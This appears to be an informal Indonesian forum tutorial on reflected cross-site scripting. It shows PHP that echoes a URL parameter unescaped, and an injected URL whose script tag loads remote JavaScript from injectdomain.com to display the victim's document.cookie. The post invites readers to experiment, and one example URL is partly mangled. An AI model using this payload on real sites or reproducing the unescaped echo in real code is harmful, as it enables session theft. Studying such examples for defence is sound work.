GET VARIABLE URL [XSS]
untuk bug ini memang sederhana tapi ke na kalo smpet keindeks google, kan ga enak kalo diliat...
misalna aja ada variable $pesan pada URL tros ditampilin dengan perintah echo pada php di halaman web
contohna:
http://ko-main2.com/landingpage.php?act ... OK_Kterimanah lo, kalo di web na ada ke gini:
<?
echo $_GET['pesan'];
?>
lah nyang ditampilin variable pesan tadi donk !!!
lalu gimana kalo gw bikin php inject na

dengan methode XSS

( Cross Site Scripting)
misalna gw pake ke nyang ini:
http://ko-main2.com/landingpage.php?action=submit&pesan=<script src=http://injectdomain.com/gwgigitlu.js></script>
lalu dalam gwgigitlu.js tersimpan script js bwat ke gini misalna:
document.write ("This is remote text via gwgigitlu.js located at injectdomain.com " + document.cookie);
alert ("This is remote text via gwgigitlu.js located at injectdomain.com " + document.cookie);
nah liat apa yang terjadi, cookies pada server bisa keliatan...
selamat bereksperimen !!!